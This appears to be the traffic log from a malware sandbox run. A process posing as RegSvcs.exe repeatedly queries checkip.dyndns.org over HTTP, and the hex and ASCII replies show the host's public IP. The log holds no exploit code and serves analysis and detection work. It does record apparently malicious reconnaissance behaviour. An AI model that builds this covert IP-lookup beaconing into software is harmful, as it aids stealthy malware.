                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:54.120743990 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:53 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: eaefc4771e47cb4e5cb623f597a7e047
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  8 | 192.168.2.22 | 49182 | 193.122.6.168 | 80 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:55.063009977 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:55.697236061 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:55 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 4b74fb5aab6d6fa9d6dd67aaac284442
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:55.908642054 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:55 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 4b74fb5aab6d6fa9d6dd67aaac284442
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  9 | 192.168.2.22 | 49184 | 193.122.6.168 | 80 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:57.102463007 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:57.759094000 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:57 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 9268c4bede93e4756e563bc2605faeb7
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:57.968663931 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:57 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 9268c4bede93e4756e563bc2605faeb7
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  10 | 192.168.2.22 | 49186 | 158.101.44.242 | 80 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:58.420878887 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:00.417362928 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 13bf43228afe4c7732f638885046d79f
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:00.600786924 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 13bf43228afe4c7732f638885046d79f
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  11 | 192.168.2.22 | 49187 | 193.122.6.168 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:12:59.888009071 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:00.544815063 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: fb937dae0fcbdb504e6099992964703d
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:00.574348927 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:13:00.762027025 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 9a59ba4ebb24a79384a4e716001db648
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:00.976706028 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 9a59ba4ebb24a79384a4e716001db648
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:01.568557978 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:13:01.836648941 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:01 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 2b619f83d9b46b0a38d299fd341a3c3f
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:02.052743912 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:01 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 2b619f83d9b46b0a38d299fd341a3c3f
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  12 | 192.168.2.22 | 49191 | 193.122.130.0 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:13:02.477140903 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:13:03.319080114 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:03 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: cb17838e8e155477c13e926a915b3065
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:03.528685093 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:03 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: cb17838e8e155477c13e926a915b3065
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  13 | 192.168.2.22 | 49193 | 158.101.44.242 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:13:04.038429022 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:05.162117004 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:04 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: aff32af932fe76204abaa83ac6f1ca8a
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:05.162138939 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:04 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: aff32af932fe76204abaa83ac6f1ca8a
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:05.162242889 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:04 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: aff32af932fe76204abaa83ac6f1ca8a
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  14 | 192.168.2.22 | 49195 | 132.226.247.73 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:13:05.826762915 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:06.520313978 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:06 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 69f23fabfecb6779c21356fbaa77574b
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:06.728717089 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:06 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 69f23fabfecb6779c21356fbaa77574b
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  15 | 192.168.2.22 | 49197 | 158.101.44.242 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:13:07.255975962 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:07.819729090 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:07 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 179ed7c50625ba7e3fce087d99c79066
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:08.028758049 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:07 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 179ed7c50625ba7e3fce087d99c79066
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  16 | 192.168.2.22 | 49199 | 132.226.247.73 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:13:08.513355970 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:09.177819967 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 235dc4ad3b563557b820fe3b20d9c737
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:09.384794950 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 235dc4ad3b563557b820fe3b20d9c737
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


